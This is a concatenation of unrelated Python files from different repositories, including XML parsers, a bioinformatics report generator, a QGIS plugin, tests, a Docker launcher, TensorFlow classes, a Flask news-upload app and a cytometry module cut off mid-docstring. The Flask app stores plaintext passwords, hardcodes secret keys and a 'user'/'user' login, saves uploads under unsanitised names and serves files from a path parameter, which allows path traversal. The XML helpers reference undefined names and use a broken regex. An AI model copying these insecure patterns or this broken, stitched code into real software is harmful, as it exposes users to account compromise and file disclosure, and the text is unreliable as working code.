import os class Config(object): DEBUG = False class DevelopmentConfig(Config): DEBUG = True SQLALCHEMY_DATABASE_URI = os.getenv('SQLALCHEMY_DATABASE_URI', 'postgresql://postgres@localhost/registermetadata') class TestConfig(Config): DEBUG = True SQLALCHEMY_DATABASE_URI = os.getenv('SQLALCHEMY_DATABASE_URI', 'postgresql://registermetadata:registermetadata@localhost/registermetadata') <gh_stars>10-100 ''' xml: general functions for parsing xml ''' import re import os import tarfile import xmltodict from wordfish.utils import get_url def get_xml_tree(tarball): '''get_xml_tree: get xmltree from a tarball (.tar.gz) file (appropriate for pubmed open content) Parameters ========== tarball: path (str) full path to .tar.gz file Returns ======= raw: str raw text from the xml file ''' if re.search("[.tar.gz]",tarball): raw = extract_xml_compressed(paper) else: raw = read_xml(tarball) return raw def recursive_text_extract(xmltree,element_name): '''recursive_text_extract Return text for xml tree elements with element_name Parameters ========== xmltree: an xmltree object ''' text = [] queue = [] record_ids = [] for elem in reversed(list(xmltree)): queue.append(elem) while (len(queue) > 0): current = queue.pop() if current.text != None: text.append(current.text) if element_name in current.keys(): record_ids.append(current.text) if len(list(current)) > 0: for elem in reversed(list(current)): queue.append(elem) return record_ids def extract_xml_compressed(tarball): '''extract_xml_compressed Read XML from compressed file ''' tar = tarfile.open(tarball, 'r:gz') for tar_info in tar: if os.path.splitext(tar_info.name)[1] == ".nxml": print("Extracting text from %s" %(tar_info.name)) file_object = tar.extractfile(tar_info) return file_object.read().replace('\n', '') def read_xml_url(url): page = get_url(url) return xmltodict.parse(page) def read_xml(xml): '''read_xml Extract text from xml or nxml file Parameters ========== xml: path/str path to xml file Returns ======= text with newlines replaced with "" ''' with open (xml, "r") as myfile: return myfile.read().replace('\n', '') def crop_text(text,remove_before="<abstract>",remove_after="<ref-list>"): '''crop_text Cut out article sections we aren't interested in ''' # Remove everything before abstract start = re.compile(remove_before) end = re.compile(remove_after) start = start.search(text) end = end.search(text) return text[start.start():end.start()] def remove_formatting(text,to_remove=None): if to_remove == None: to_remove = ["<italic>","<bold>","<p>","<sub>","<table>","<td>","<tr>"] for remove in to_remove: text = text.replace(remove,"") text = text.replace(remove.replace("<","</"),"") return text def search_text(text,terms): '''search_text Search text for list of terms, return list of match counts ''' vector = np.zeros(len(terms)) for t in range(0,len(terms)): expression = re.compile("\s%s\s|\s%s\." 
%(terms[t],terms[t])) match = expression.findall(text) vector[t] = len(match) return vector <gh_stars>1-10 from Module import AbstractModule class Module(AbstractModule): def __init__(self): AbstractModule.__init__(self) def run( self, network, antecedents, out_attributes, user_options, num_cores, outfile): import os import shutil import math from Betsy import bie3 import arrayio from genomicode import htmllib from genomicode import parselib outfile_folder = outfile outfile = os.path.join(outfile_folder, 'report.html') if not os.path.exists(outfile_folder): os.mkdir(outfile_folder) result_files = [] for data_node in antecedents: filename = data_node.identifier new_name = os.path.join(outfile_folder, os.path.split(filename)[-1]) if os.path.isdir(filename): shutil.copytree(filename, new_name) else: shutil.copyfile(filename, new_name) result_files.append(os.path.split(new_name)[-1]) (data_node1, data_node2, data_node3, data_node4, data_node5, data_node6, data_node7, data_node8, data_node9, data_node10, data_node11) = antecedents #write the report.html #def highlight(s): # from genomicode import htmllib # return htmllib.SPAN(s, style="background-color:yellow") #def smaller(s): # from genomicode import htmllib # return htmllib.FONT(s, size=-1) try: lines = [] w = lines.append w("<HTML>") title = "Classification Results" x = parselib.remove_all_tags(title) w(htmllib.HEAD(htmllib.TITLE(x))) w("<BODY>") w(htmllib.CENTER(htmllib.H1(title))) #------------------------------------ w(htmllib.H3("SVM")) w(htmllib.P()) w(htmllib.A("Methods", href="#methods_svm")) w(htmllib.P()) #------------------------------------ whole_row = [] name = 'Table 1: Table of genes used in classification' w(htmllib.B(name)) w(htmllib.P()) M = arrayio.read(os.path.join(outfile_folder, result_files[0])) ids = M._row_order genes = M.row_names(ids[0]) ncolumn = 3 nrow = 8 rows = [] for i in range(min(nrow, len(genes) / ncolumn)): a = [] for j in range(0, ncolumn): a.append('<td>' + genes[ncolumn * i + j] + '</td>') x = htmllib.TR("\n".join(a)) rows.append(x) more_genes = 0 if len(genes) > ncolumn * nrow: more_genes = len(genes) - ncolumn * nrow y = htmllib.TR(htmllib.TD(htmllib.TABLE("\n".join(rows), border=1, cellpadding=3, cellspacing=0), align='CENTER') + htmllib.TD(htmllib.A(htmllib.IMG(height=400, src=result_files[5]), href=result_files[5]), align='CENTER')) #--------------------------------- whole_row.append(y) y = htmllib.TR(htmllib.TD( htmllib.A(str(more_genes) + ' more genes', result_files[0]), align='LEFT') + htmllib.TD(htmllib.B( 'Figure 1: This figure shows the PCA plot of samples colored by prediction'), align='CENTER')) whole_row.append(y) x = htmllib.TR(htmllib.TD(htmllib.A(htmllib.IMG(height=400, src=result_files[4]), href=result_files[4]), align="CENTER") + htmllib.TD(htmllib.A(htmllib.IMG(height=400, src=result_files[2]), href=result_files[2]), align="CENTER")) whole_row.append(x) x = htmllib.TR( htmllib.TH(htmllib.A("Figure 2. Loocv result on training data", result_files[3]), align="CENTER") + htmllib.TH(htmllib.A("Figure 3. 
Prediction result on test data", result_files[1]), align="CENTER")) whole_row.append(x) w(htmllib.TABLE("\n".join(whole_row), border=None, cellpadding=3, cellspacing=0)) w(htmllib.P()) #------------------------------------ w(htmllib.H3("Weighted Voting")) w(htmllib.P()) w(htmllib.A("Methods", href="#methods_wv")) w(htmllib.P()) #------------------------------------ whole_row = [] name = 'Table 1: Table of genes used in classification' w(htmllib.B(name)) w(htmllib.P()) nfeature = 10 if 'num_features_value' in user_options: nfeature = user_options['num_features_value'] M = arrayio.read(os.path.join(outfile_folder, result_files[0])) ids = M._row_order genes = M.row_names(ids[0])[0:nfeature] nrow = min(8, int(math.ceil(float(len(genes)) / ncolumn))) ncolumn = 3 if len(genes) < nrow * ncolumn: genes.extend([''] * (nrow * ncolumn - len(genes))) rows = [] for i in range(nrow): a = [] for j in range(ncolumn): a.append('<td>' + genes[ncolumn * i + j] + '</td>') x = htmllib.TR("\n".join(a)) rows.append(x) more_genes = 0 if len(genes) > ncolumn * nrow: more_genes = len(genes) - ncolumn * nrow y = htmllib.TR(htmllib.TD(htmllib.TABLE("\n".join(rows), border=1, cellpadding=3, cellspacing=0), align='CENTER') + htmllib.TD(htmllib.A(htmllib.IMG(height=400, src=result_files[10]), href=result_files[10]), align='CENTER')) #--------------------------------- whole_row.append(y) y = htmllib.TR(htmllib.TD( htmllib.A(str(more_genes) + ' more genes', result_files[0]), align='LEFT') + htmllib.TD(htmllib.B( 'Figure 4: This figure shows the PCA plot of samples colored by prediction'), align='CENTER')) whole_row.append(y) x = htmllib.TR(htmllib.TD(htmllib.A(htmllib.IMG(height=400, src=result_files[9]), href=result_files[9]), align="CENTER") + htmllib.TD(htmllib.A(htmllib.IMG(height=400, src=result_files[7]), href=result_files[7]), align="CENTER")) whole_row.append(x) x = htmllib.TR( htmllib.TH(htmllib.A("Figure 2. Loocv result on training data", result_files[8]), align="CENTER") + htmllib.TH(htmllib.A("Figure 3. 
Prediction result on test data", result_files[6]), align="CENTER")) whole_row.append(x) w(htmllib.TABLE("\n".join(whole_row), border=None, cellpadding=3, cellspacing=0)) w(htmllib.P()) #-------------------------------- w(htmllib.HR()) w(htmllib.A("<methods_svm>", name="methods_svm")) w('To generate these files, I ran the following analysis:') bie3.plot_network_gv(os.path.join(outfile_folder, "network.png"), network) w(htmllib.P()) w(htmllib.A(htmllib.IMG(height=500, src="network.png"), href="network.png")) w(htmllib.CENTER(htmllib.H2("SVM Methods"))) w(htmllib.H3("Prediction Result")) w('I used the following parameters:') rows = [] x = htmllib.TR(htmllib.TH("Parameter", align="LEFT") + htmllib.TH("Value", align="LEFT")) rows.append(x) for key in data_node2.data.attributes.keys(): x = htmllib.TR(htmllib.TD(key, align="LEFT") + htmllib.TD(data_node2.data.attributes[key], align="LEFT")) rows.append(x) w(htmllib.TABLE("\n".join(rows), border=1, cellpadding=3, cellspacing=0)) w(htmllib.P()) w(htmllib.A("<methods_wv>", name="methods_wv")) w(htmllib.CENTER(htmllib.H2("Weighted Voting Methods"))) w(htmllib.H3("Prediction Result")) w('I used the following parameters:') rows = [] x = htmllib.TR(htmllib.TH("Parameter", align="LEFT") + htmllib.TH("Value", align="LEFT")) rows.append(x) for key in data_node7.data.attributes.keys(): x = htmllib.TR(htmllib.TD(key, align="LEFT") + htmllib.TD(data_node7.data.attributes[key], align="LEFT")) rows.append(x) w(htmllib.TABLE("\n".join(rows), border=1, cellpadding=3, cellspacing=0)) w(htmllib.P()) # Write out the footer. #time_str = parselib.pretty_date(time.time()) #hostname = pretty_hostname() w(htmllib.P()) w(htmllib.HR()) #w(htmllib.EM( # "This analysis was run on %s on %s. \n" % # (time_str, hostname))) w("</BODY>") w("</HTML>") x = "\n".join(lines) + "\n" open(outfile, 'w').write(x) except: raise def name_outfile(self, antecedents, user_options): filename = 'report' return filename <reponame>ugurcan-sonmez-95/HackerRank_Problems<filename>Algorithms/Strings/HackerRank_in_a_String/main.py ### HackerRank_in_a_String! 
- Solution def hackerrankInString(): query_count = int(input()) while query_count: s = input() s1 = "hackerrank" count, temp = 0, 0 for i in range(len(s1)): for j in range(temp, len(s)): if s[j] == s1[i]: count += 1 temp = j+1 break ans = "YES" if (count == 10) else "NO" print(ans) query_count -= 1 hackerrankInString()from qgis.core import * from qgis.gui import * from PyQt4.QtGui import * from PyQt4.QtCore import * class CrossSymbolLayer(QgsMarkerSymbolLayerV2): def __init__(self, length=10.0, width=2.0): QgsMarkerSymbolLayerV2.__init__(self) self.length = length self.width = width def layerType(self): return "Cross" def properties(self): return {'length' : self.length, 'width' : self.width} def clone(self): return CrossSymbolLayer(self.length, self.width) def startRender(self, context): self.pen = QPen() self.pen.setWidth(self.width) def stopRender(self, context): self.pen = None def renderPoint(self, point, context): left = point.x() - self.length right = point.x() + self.length bottom = point.y() - self.length top = point.y() + self.length if context.selected(): self.pen.setColor(context.selectionColor()) else: self.pen.setColor(self.color()) painter = context.renderContext().painter() painter.setPen(self.pen) painter.drawLine(left, bottom, right, top) painter.drawLine(right, bottom, left, top) class CrossSymbolLayerWidget(QgsSymbolLayerV2Widget): def __init__(self, parent=None): QgsSymbolLayerV2Widget.__init__(self, parent) self.layer = None self.lengthField = QSpinBox(self) self.lengthField.setMinimum(1) self.lengthField.setMaximum(100) self.connect(self.lengthField, SIGNAL("valueChanged(int)"), self.lengthChanged) self.widthField = QSpinBox(self) self.widthField.setMinimum(1) self.widthField.setMaximum(100) self.connect(self.widthField, SIGNAL("valueChanged(int)"), self.widthChanged) self.form = QFormLayout() self.form.addRow("Length", self.lengthField) self.form.addRow("Width", self.widthField) self.setLayout(self.form) def setSymbolLayer(self, layer): if layer.layerType() == "Cross": self.layer = layer self.lengthField.setValue(layer.length) self.widthField.setValue(layer.width) def symbolLayer(self): return self.layer def lengthChanged(self, n): self.layer.length = n self.emit(SIGNAL("changed()")) def widthChanged(self, n): self.layer.width = n self.emit(SIGNAL("changed()")) class CrossSymbolLayerMetadata(QgsSymbolLayerV2AbstractMetadata): def __init__(self): QgsSymbolLayerV2AbstractMetadata.__init__(self, "Cross", "Cross Marker", QgsSymbolV2.Marker) def createSymbolLayer(self, properties): if "length" in properties: length = int(properties['length']) else: length = 10 if "width" in properties: width = int(properties['width']) else: width = 2 return CrossSymbolLayer(length, width) def createSymbolLayerWidget(self, layer): return CrossSymbolLayerWidget() registry = QgsSymbolLayerV2Registry.instance() registry.addSymbolLayerType(CrossSymbolLayerMetadata()) <reponame>t-reppert/PythonMorsels from decimal import Decimal import unittest from perfect_square import is_perfect_square class IsPerfectSquareTests(unittest.TestCase): """Tests for is_perfect_square.""" def test_small_number(self): self.assertTrue(is_perfect_square(1)) self.assertTrue(is_perfect_square(4)) self.assertFalse(is_perfect_square(8)) self.assertFalse(is_perfect_square(35)) def test_4_digit_number(self): self.assertTrue(is_perfect_square(5776)) self.assertFalse(is_perfect_square(9306)) def test_big_number(self): self.assertTrue(is_perfect_square(1586375448590241)) self.assertFalse(is_perfect_square(1420958445736851)) 
def test_non_real_numbers(self): self.assertFalse(is_perfect_square(4.5)) with self.assertRaises(TypeError): is_perfect_square(1j) with self.assertRaises(TypeError): is_perfect_square('hello') def test_decimal_number(self): square_number = Decimal('100') self.assertTrue(is_perfect_square(square_number)) self.assertFalse(is_perfect_square(square_number-1)) self.assertFalse(is_perfect_square(square_number+1)) # To test the Bonus part of this exercise, comment out the following line <EMAIL> def test_negative_numbers(self): square_number = -4 self.assertFalse(is_perfect_square(square_number)) self.assertFalse(is_perfect_square(square_number-1)) self.assertFalse(is_perfect_square(square_number+1)) # To test the Bonus part of this exercise, comment out the following line <EMAIL> def test_really_big_numbers(self): n = 838382848348234**2 m = n**2 m = 8383828483252752341748234**2 self.assertTrue(is_perfect_square(n)) self.assertFalse(is_perfect_square(n-1)) self.assertFalse(is_perfect_square(n+1)) self.assertTrue(is_perfect_square(m)) self.assertFalse(is_perfect_square(m-1)) self.assertFalse(is_perfect_square(m+1)) # To test the Bonus part of this exercise, comment out the following line <EMAIL> def test_complex_numbers(self): self.assertTrue(is_perfect_square(-4, complex=True)) self.assertTrue(is_perfect_square(-100, complex=True)) self.assertFalse(is_perfect_square(-1000, complex=True)) self.assertTrue(is_perfect_square(512j, complex=True)) self.assertFalse(is_perfect_square(100j, complex=True)) self.assertTrue(is_perfect_square(-5+12j, complex=True)) with self.assertRaises(TypeError): is_perfect_square(-4, True) # complex must be a keyword argument if __name__ == "__main__": unittest.main()import argparse import os def get_current_path(): """Special case for Windows Docker Toolbox users.""" current_path = os.getcwd() if os.getenv("DOCKER_TOOLBOX_INSTALL_PATH") is not None: if len(os.environ["DOCKER_TOOLBOX_INSTALL_PATH"]): current_path = current_path.replace(":", "") current_path = current_path.replace("\\\\", "/") current_path = current_path.replace("\\", "/") current_path = current_path.replace("C", "c") current_path = f"/{current_path}" else: current_path = f'"{current_path}"' return current_path def main(): parser = argparse.ArgumentParser(add_help=True, description="Run docker image.") parser.add_argument( "command", default="lab", help="Command (notebook | lab | shell)" ) parser.add_argument( "--docker_tag", "-t", default="9dogs/ml:latest", help="Docker image tag" ) parser.add_argument( "--gpus", default=None, help="GPUs to forward to the container (all | 1 | 2 etc.)" ) args = parser.parse_args() path = get_current_path() if args.gpus: gpus = f"--gpus {args.gpus}" else: gpus = "" run_command = ( f"docker run -it --rm -p 4545:4545 {gpus} " f"-v {path}:/notebooks -w /notebooks {args.docker_tag} " f"{args.command}" ) print("Running command: ", run_command) os.system(run_command) if __name__ == "__main__": main() from .Utils import * <filename>tensorstream/common/extremum.py import tensorflow as tf from tensorstream.common import shift from tensorstream.streamable import Streamable class GlobalMinimum(Streamable): def step(self, value, global_min=None, is_first_iteration=True): if global_min is None: global_min = tf.zeros(tf.shape(value), value.dtype) new_min = tf.cond( tf.logical_or( is_first_iteration, tf.less(value, global_min) ), lambda: value, lambda: global_min ) return new_min, (new_min, False), (global_min, is_first_iteration) class GlobalMaximum(Streamable): def step(self, value, 
global_max=None, is_first_iteration=True): if global_max is None: global_max = tf.zeros(tf.shape(value), value.dtype) new_max = tf.cond( tf.logical_or( is_first_iteration, tf.greater(value, global_max) ), lambda: value, lambda: global_max ) return new_max, (new_max, False), (global_max, is_first_iteration) class LocalExtremum(Streamable): def __init__(self, period): super().__init__() self.period = period class LocalMinimum(LocalExtremum): def __init__(self, period): super().__init__(period) def step(self, value, last_values=None, iteration=0): if last_values is None: shape = self.concat([self.period], tf.shape(value)) last_values = tf.zeros(shape, value.dtype) new_last_values = shift(value, last_values) min_value = tf.cond( tf.less(iteration, self.period - 1), lambda: tf.reduce_min(new_last_values[:iteration + 1]), lambda: tf.reduce_min(new_last_values) ) return min_value, (new_last_values, iteration + 1), (last_values, iteration) class LocalMaximum(LocalExtremum): def __init__(self, period): super().__init__(period) def step(self, value, last_values=None, iteration=0): if last_values is None: shape = self.concat([self.period], tf.shape(value)) last_values = tf.zeros(shape, value.dtype) new_last_values = shift(value, last_values) max_value = tf.cond( tf.less(iteration, self.period - 1), lambda: tf.reduce_max(new_last_values[:iteration + 1]), lambda: tf.reduce_max(new_last_values) ) return max_value, (new_last_values, iteration + 1), (last_values, iteration) import os from flask import Flask, request, flash, url_for, redirect, render_template,session,escape,send_file,make_response from flask_sqlalchemy import SQLAlchemy from tkinter import * from PIL import ImageTk,Image from datetime import datetime import pdfkit app = Flask(__name__) app.secret_key='any' app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///students.sqlite3' app.config['SECRET_KEY'] = "random string" config = pdfkit.configuration(wkhtmltopdf='/usr/bin/wkhtmltopdf') db = SQLAlchemy(app) class tb_login1(db.Model): id = db.Column('student_id', db.Integer, primary_key = True) username = db.Column(db.String(100)) password = db.Column(db.String(50)) city = db.Column(db.String(50)) class tb_Admin1(db.Model): id = db.Column('admin_id', db.Integer, primary_key = True) username = db.Column(db.String(100)) password = db.Column(db.String(50)) class tb_uploads(db.Model): id=db.Column('image_id',db.Integer,primary_key = True) imagename=db.Column(db.String(200)) valid=db.Column(db.String(10)) city=db.Column(db.String(50)) class tb_uploads1(db.Model): id=db.Column('image_id',db.Integer,primary_key = True) imagename=db.Column(db.String(200)) valid=db.Column(db.String(10)) city=db.Column(db.String(50)) date=db.Column(db.String(50)) caption=db.Column(db.String(100)) content=db.Column(db.String(500)) class tb_uploads2(db.Model): id=db.Column('image_id',db.Integer,primary_key = True) imagename=db.Column(db.String(200)) valid=db.Column(db.String(10)) city=db.Column(db.String(50)) date=db.Column(db.String(50)) caption=db.Column(db.String(100)) content=db.Column(db.String(500)) category=db.Column(db.String(50)) class tb_uploads3(db.Model): id=db.Column('image_id',db.Integer,primary_key = True) imagename=db.Column(db.String(200)) Caption=db.Column(db.String(50)) Content=db.Column(db.String(450)) Category=db.Column(db.String(10)) DateTime=db.Column(db.DateTime()) city=db.Column(db.String(10)) Uploadedby=db.Column(db.String(10)) valid=db.Column(db.String(10)) class tb_temp1(db.Model): 
id=db.Column('timage_id',db.Integer,primary_key=True) class tb_temp2(db.Model): pid=db.Column('timage_id',db.Integer,primary_key=True) id=db.Column(db.Integer) def __init__(self,username,password,city): self.username = username self.password = password self.city = city #UPLOAD_FOLDER = '/home/krunal/projects/news/FlaskWebProject1/uploads' UPLOAD_FOLDER='/home/krunal/projects/news/FlaskWebProject1/uploads' app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER @app.route('/',methods = ['GET', 'POST']) def Login(): if request.method == 'POST': t=tb_temp2.query.all() for y in t: session['tid']=y.id s=tb_login1.query.all() for x in s: if request.form["uname"]==x.username and request.form["pword"]==x.password: session['susername']=x.username session['scity']=x.city session['sid']=x.id return redirect(url_for('home',susername=session['susername'],scity=session['scity'])) elif request.form["uname"]=='user' and request.form["pword"]=='user': return redirect(url_for('show_all')) return redirect(url_for('Login') ) else: #return redirect(url_for('Login')) return render_template('Login.html' ) @app.route('/home', methods = ['GET', 'POST']) def home(): if session['susername']=='z': #return redirect(url_for('Login')) return render_template('Login.html') else: return render_template('home.html',tb_login1 = tb_login1.query.all(),tb_uploads3=tb_uploads3.query.all()) @app.route('/Sports', methods = ['GET', 'POST']) def Sports(): return render_template('sports.html',tb_login1 = tb_login1.query.all(),tb_uploads3=tb_uploads3.query.all()) @app.route('/educational', methods = ['GET', 'POST']) def educational(): return render_template('educational.html',tb_login1 = tb_login1.query.all(),tb_uploads3=tb_uploads3.query.all()) @app.route('/business', methods = ['GET', 'POST']) def business(): return render_template('business.html',tb_login1 = tb_login1.query.all(),tb_uploads3=tb_uploads3.query.all()) @app.route('/lifestyle', methods = ['GET', 'POST']) def lifestyle(): return render_template('lifestyle.html',tb_login1 = tb_login1.query.all(),tb_uploads3=tb_uploads3.query.all()) @app.route('/entertainment', methods = ['GET', 'POST']) def entertainment(): return render_template('entertainment.html',tb_login1 = tb_login1.query.all(),tb_uploads3=tb_uploads3.query.all()) @app.route('/technology', methods = ['GET', 'POST']) def technology(): return render_template('technology.html',tb_login1 = tb_login1.query.all(),tb_uploads3=tb_uploads3.query.all()) @app.route('/show_all', methods = ['GET', 'POST']) def show_all(): return render_template('show_all.html', tb_login1 = tb_login1.query.all(),tb_uploads3 = tb_uploads3.query.all() ) @app.route('/approve_news/<imagepath>', methods = ['GET', 'POST']) def approve_news(imagepath): s=tb_uploads3.query.all() for x in s: if imagepath==x.imagename: x.valid='yes' db.session.commit() return render_template('show_all.html', tb_login1 = tb_login1.query.all(),tb_uploads3 = tb_uploads3.query.all() ) @app.route('/new', methods = ['GET', 'POST']) def new(): if request.method == 'POST': if not request.form['username'] or not request.form['password']: flash('Please enter all the fields', 'error') else: s=tb_login1.query.all() for x in s: if request.form['username']==x.username: flash('username is already taken please try another one','error') return render_template('new.html') if request.form['password']!=request.form['<PASSWORD>']: flash('Password is not matching','error') return render_template('new.html') else: tb_log = tb_login1(username=request.form['username'], password=request.form['password'], 
city=request.form['city']) db.session.add(tb_log) db.session.commit() flash('Record was successfully added') return redirect(url_for('show_all')) return render_template('new.html') @app.route('/upload_news', methods = ['GET', 'POST']) def upload_news(): return render_template('upload_news.html') @app.route('/uploader', methods=['GET','POST']) def upload_file(): if request.method == 'POST': file =request.files['file'] f = os.path.join(file.filename) print (os.path.join(file.filename)) f = request.files['file'] file.save(os.path.join(app.config['UPLOAD_FOLDER'],str(session['tid'])+session['susername']+file.filename)) tb_up = tb_uploads3(imagename=str(session['tid'])+session['susername']+file.filename,Caption=request.form['caption'], Content=request.form['content'],Category=request.form['category'],DateTime=datetime.now(), city=session['scity'],Uploadedby=session['susername'],valid='no') q=tb_temp2(id=session['tid']+1) db.session.add(q) db.session.add(tb_up) db.session.commit() session['tid']=session['tid']+1 flash('Record was successfully added') return redirect(url_for('home',susername=session['susername'],scity=session['scity'])) @app.route('/update_profile', methods = ['GET', 'POST']) def update_profile(): if request.method == 'POST': if not request.form['username'] or not request.form['password']: flash('Please enter all the fields', 'error') else: s=tb_login1.query.all() for x in s: if request.form["username"]==x.username: x.city=request.form['city'] x.password=request.form['password'] db.session.commit() flash('Record was successfully added') return redirect(url_for('show_all')) #else: #return render_template("update_profile.html") return render_template('update_profile.html') @app.route('/view_image/<imagepath>',methods = ['GET', 'POST']) def view_image(imagepath): #print("<html><body><input type='button' text='back' onclick='home.html'></body></html>")
#return send_file('/home/krunal/projects/news/FlaskWebProject1/uploads'+imagepath, attachment_filename=imagepath) return send_file('/home/krunal/projects/news/FlaskWebProject1/uploads/'+imagepath,attachment_filename=imagepath) @app.route('/Logout') def Logout(): #session.clear() session['susername']='z' #return render_template('Login.html') return redirect(url_for('Login')) @app.route('/Save/<imagepath>',methods = ['GET', 'POST']) def Save(imagepath): rendered=render_template('save.html',imagepath=imagepath,tb_uploads3=tb_uploads3.query.all()) #rendered = render_template('downloads.html') pdf=pdfkit.from_string(rendered,False,configuration=config) response = make_response(pdf) response.headers['Content-Type']= 'application/pdf' response.headers['Content-Disposition'] = 'attachment; filename=news.pdf' return response if __name__ == '__main__': db.create_all() app.run(debug = True)from flask import Blueprint, render_template site = Blueprint( "site",
__name__, url_prefix="/", static_url_path="", static_folder="static", template_folder="templates", ) @site.route("/") def index(): return render_template("index.html") @site.route("/about") def about(): return render_template("about.html") @site.route("/work") def work(): return render_template("work.html") @site.route("/work-single") def work_single(): return render_template("work-single.html") @site.route("/pricing") def pricing(): return render_template("pricing.html") @site.route("/contact") def contact(): return render_template("contact.html") # -*- coding: utf-8 -*- """Test views to run actions.""" import os from django.conf import settings from django.urls import reverse from rest_framework import status from ontask import tests from ontask.action.views import action_import class ActionViewExport(tests.OnTaskTestCase): """Test the view to run actio item filter, json and email.""" fixtures = ['simple_workflow_two_actions'] filename = os.path.join( settings.ONTASK_FIXTURE_DIR, 'simple_workflow_two_actions.sql') user_email = '<EMAIL>' user_pwd = '<PASSWORD>' workflow_name = 'wflow2' def test_export_ask(self): """Test the export views.""" action = self.workflow.actions.get(name='Detecting age') resp = self.get_response( 'workflow:export_list_ask', {'wid': action.workflow.id}) self.assertTrue(status.is_success(resp.status_code)) self.assertTrue(action.name in str(resp.content)) # Get export done # BROKEN!!! resp = self.get_response( 'workflow:export_list_ask', {'wid': action.workflow.id}, method='POST', req_params={'select_0': True}) self.assertTrue(status.is_success(resp.status_code)) self.assertTrue('Your download will start ' in str(resp.content)) # Get export download resp = self.get_response( 'action:export', {'pklist': str(action.id)}) self.assertTrue(status.is_success(resp.status_code)) self.assertEqual(resp['Content-Type'], 'application/octet-stream') def test_action_import(self): """Test the import .""" # Get request resp = self.get_response( 'action:import') self.assertTrue(status.is_success(resp.status_code)) self.assertTrue('File containing a previously' in str(resp.content)) file_obj = open( os.path.join( settings.BASE_DIR(), 'lib', 'surveys', 'spq_survey.gz'), 'rb') # Post request req = self.factory.post( reverse('action:import'), {'upload_file': file_obj}) req.META['HTTP_ACCEPT_ENCODING'] = 'gzip, deflate' req.FILES['upload_file'].content_type = 'application/x-gzip' req = self.add_middleware(req) resp = action_import(req) self.assertEqual(resp.status_code, status.HTTP_302_FOUND) # Fails if the action is not there self.workflow.actions.get(name='SPQ') #!/usr/bin.env/python # -*- coding: utf-8 -*- """ For the purpose of cytometry analysis we often think of a population of cells as having a particular phenotype that can be identified by sub-setting cells in one or two dimensional space. This results in geometric objects that define a population. This module houses the functionality around those geometric objects. 
Copyright 2020 <NAME> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ from ..flow import transform import numpy as np import pandas as pd from multiprocessing import Pool, cpu_count from warnings import warn from functools import partial from matplotlib.patches import Ellipse from scipy import linalg, stats from scipy.spatial.qhull import ConvexHull, QhullError from shapely.geometry import Polygon, Point import mongoengine __author__ = "<NAME>" __copyright__ = "Copyright 2020, cytopy" __credits__ = ["<NAME>", "<NAME>", "<NAME>", "<NAME>"] __license__ = "MIT" __version__ = "2.0.0" __maintainer__ = "<NAME>" __email__ = "<EMAIL>" __status__ = "Production" class PopulationGeometry(mongoengine.EmbeddedDocument): """ Geometric shape generated by non-threshold generating Gate Attributes ----------- x: str Name of the X-dimension e.g. CD3, FSC-A etc y: str Name of the Y-dimension e.g. CD3, FSC-A etc transform_x: str Transformation method applied to the x-axis transform_y: str Transformation method applied to the y-axis transform_x_kwargs: dict Transformation keyword arguments for transform method applied to the x-axis transform_y_kwargs: str Transformation keyword arguments for transform method applied to the y-axis """ x = mongoengine.StringField() y = mongoengine.StringField() transform_x = mongoengine.StringField() transform_y = mongoengine.StringField() transform_x_kwargs = mongoengine.DictField() transform_y_kwargs = mongoengine.DictField() meta = {'allow_inheritance': True} class ThresholdGeom(PopulationGeometry): """ Threshold shape. Inherits from PopulationGeometry. Attributes ----------- x_threshold: float Threshold applied to the X-axis y_threshold: float Threshold applied to the Y-axis """ x_threshold = mongoengine.FloatField() y_threshold = mongoengine.FloatField() def transform_to_linear(self): """ Thresholds are transformed to their equivalent value in linear space according to the transform defined. If transform is None, thresholds are returned as saved. 
Returns ------- float, float """ x, y = self.x_threshold, self.y_threshold if self.transform_x: kwargs = self.transform_x_kwargs or {} transformer = transform.TRANSFORMERS.get(self.transform_x)(**kwargs) x = transformer.inverse_scale(pd.DataFrame({"x": [self.x_threshold]}), features=["x"])["x"].values[0] if self.transform_y: kwargs = self.transform_y_kwargs or {} transformer = transform.TRANSFORMERS.get(self.transform_y)(**kwargs) y = transformer.inverse_scale(pd.DataFrame({"y": [self.y_threshold]}), features=["y"])["y"].values[0] return x, y class PolygonGeom(PopulationGeometry): """ Polygon shape. Inherits from PopulationGeometry. Attributes ----------- x_values: list X-axis coordinates y_values: list Y-axis coordinates """ x_values = mongoengine.ListField() y_values = mongoengine.ListField() @property def shape(self): assert self.x_values is not None and self.y_values is not None, \ "x and y values not defined for this Polygon" return create_polygon(self.x_values, self.y_values) def transform_to_linear(self): """ x,y coordinates are transformed to their equivalent value in linear space according to the transform defined. If transform is None, coordinates are returned as saved. Returns ------- numpy.ndarray, numpy.ndarray """ x_values, y_values = self.x_values, self.y_values if self.transform_x: kwargs = self.transform_x_kwargs or {} transformer = transform.TRANSFORMERS.get(self.transform_x)(**kwargs) x_values = transformer.inverse_scale(pd.DataFrame({"x": self.x_values}), features=["x"])["x"].values if self.transform_y: kwargs = self.transform_y_kwargs or {} transformer = transform.TRANSFORMERS.get(self.transform_y)(**kwargs) y_values = transformer.inverse_scale(pd.DataFrame({"y": self.y_values}), features=["y"])["y"].values return x_values, y_values def point_in_poly(coords: np.array, poly: Polygon): point = Point(coords) return poly.contains(point) def inside_polygon(df: pd.DataFrame, x: str, y: str, poly: Polygon, njobs: int = -1): """ Return rows in dataframe who's values for x and y are contained in some polygon coordinate shape Parameters ---------- df: Pandas.DataFrame Data to query x: str name of x-axis plane y: str name of y-axis plane poly: shapely.geometry.Polygon Polygon object to search njobs: int Number of jobs to run in 